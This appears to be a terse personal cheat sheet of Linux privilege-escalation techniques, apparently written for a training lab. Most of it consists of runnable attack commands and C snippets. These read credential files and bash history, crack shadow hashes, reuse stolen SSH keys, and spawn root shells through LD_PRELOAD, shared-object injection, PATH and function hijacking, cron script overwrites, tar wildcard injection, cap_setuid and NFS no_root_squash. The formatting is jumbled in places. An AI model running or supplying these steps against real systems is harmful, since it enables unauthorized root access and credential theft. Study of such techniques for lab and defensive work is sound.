get used programs/scripts (& more) in
/tools
- https://github.com/The-Z-Labs/linux-exploit-suggester
- detection
./linux-exploit-suggester.sh
- exploitation
gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
cat /home/user/myvpn.ovpn
cat /etc/openvpn/auth.txt
cat /home/user/.irssi/config | grep -i passw
cat ~/.bash_history | grep -i passw
- detection
ls -la /etc/shadow
- exploitation
- target linux
- save/copy these files
cat /etc/passwd
cat /etc/passwd
- save/copy these files
- attacker linux
unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O
- target linux
- detection
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
- exploitation
- target linux
- save/copy these files
- attacker linux
chmod 400 id_rsa
ssh -i id_rsa root@<ip>
- target linux
detection
sudo -l
- notice the list of programs that can run via sudo
exploitation
- target linux
sudo apache2 -f /etc/shadow
- copy root hash
- attacker linux
echo '[Pasted Root Hash]' > hash.txt
john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
john --show hash.txt
- notice that the LD_PRELOAD environment variable is intact
- save following program as (suppose)
x.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
sudo LD_PRELOAD=/tmp/x.so apache2
- detection
find / -type f -perm -04000 -ls 2>/dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
- notice that
a.so
file is missing from a writable directory
- exploitation
mkdir /home/user/.config
cd /home/user/.config
- save following program as
libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
/usr/local/bin/suid-so
- detection
dpkg -l | grep nginx
- notice that the installed nginx version is below 1.6.2-5+deb8u3
- exploitation
- target linux 1
- req. user =
www-data
- simulate =
su root
>su -l www-data
- simulate =
- https://github.com/xl7dev/Exploit/blob/master/Nginx/nginxed-root.sh
/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log
- now the system waits for logrotate to execute
- req. user =
- target linux 2
invoke-rc.d nginx rotate >/dev/null 2>&1
as root
- target linux 1
- notice that the exploit continued its execution
- target linux 1
- type 1
- detection
find / -type f -perm -04000 -ls 2>/dev/null
- make note of all the SUID binaries
strings /usr/local/bin/suid-env
- notice the functions used by the binary
- exploitation
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid-env
- detection
- type 2
- detection
find / -type f -perm -04000 -ls 2>/dev/null
- make note of all the SUID binaries
strings /usr/local/bin/suid-env2
- notice the functions used by the binary
- exploitation
- method 1
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
/usr/local/bin/suid-env2
- method 2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
- method 1
- detection
- detection
getcap -r / 2>/dev/null
- notice the value of the “cap_setuid” capability
- exploitation
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
- detection
cat /etc/crontab
- notice the value of the “PATH” variable
- exploitation
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
whereoverwrite.sh
is file executed by cronchmod +x /home/user/overwrite.sh
- wait until the job runs to give root & then
/tmp/bash -p
- detection
cat /etc/crontab
- notice the script “/usr/local/bin/compress.sh”
cat /usr/local/bin/compress.sh
- notice the wildcard (*) used by ‘tar’
- exploitation
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
- wait until the job runs to give root & then
/tmp/bash -p
- detection
cat /etc/crontab
- notice the script “overwrite.sh”
ls -l /usr/local/bin/overwrite.sh
- notice the file permissions
- exploitation
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
- wait until the job runs to give root & then
/tmp/bash -p
- detection
cat /etc/exports
- notice that “no_root_squash” option is defined for the “/tmp” export
- exploitation
- attacker linux
showmount -e <taget_linux_ip>
mkdir /tmp/1
mount -o rw,vers=2 10.10.249.85:/tmp /tmp/1
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x
- target linux
/tmp/x
- attacker linux